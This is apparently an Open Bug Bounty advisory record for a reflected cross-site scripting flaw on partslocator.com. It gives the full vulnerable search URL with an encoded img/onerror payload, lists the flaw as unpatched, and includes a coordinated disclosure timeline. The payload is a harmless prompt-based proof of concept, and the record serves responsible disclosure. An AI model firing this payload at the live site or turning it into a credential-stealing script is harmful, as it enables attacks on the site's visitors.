partslocator.com XSS vulnerability

2017-05-18T19:15:00
ID OBB:238753
Type openbugbounty
Reporter secuninja
Modified 2017-06-15T20:14:00

Description

Vulnerable URL:
http://www.partslocator.com/Search/?searchables=ops_article%2Cops_calendarevent%2Cops_geobasedata%2Ccore_page%2Cops_galleryitem%2Cops_customdata&pid=98%2C95%2C100%2C93&mod=CoreSearch&tagids=284%2C293%2C292%2C286%2C294%2C287%2C295%2C290%2C291%2C282%2C283&sortby=RELEVANCY+DESC&query=a%253E%27%253E%2522%253Et%253Ci%253Ep%253Cimg%2520src%253Dy%2520onerror%253Dprompt%28%252Fopenbugbounty%252F%29%253E&Search=

Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 28.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 1826535
VIP website status:| No
Check partslocator.com SSL connection:| (Grade: C+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 18 May, 2017 19:15 GMT
Notification sent to subscribers (without technical details)| 18 May, 2017 22:17 GMT
Generic security notifications sent to website owner| 27 May, 2017 03:52 GMT
Vulnerability details disclosed by researcher| 15 June, 2017 20:14 GMT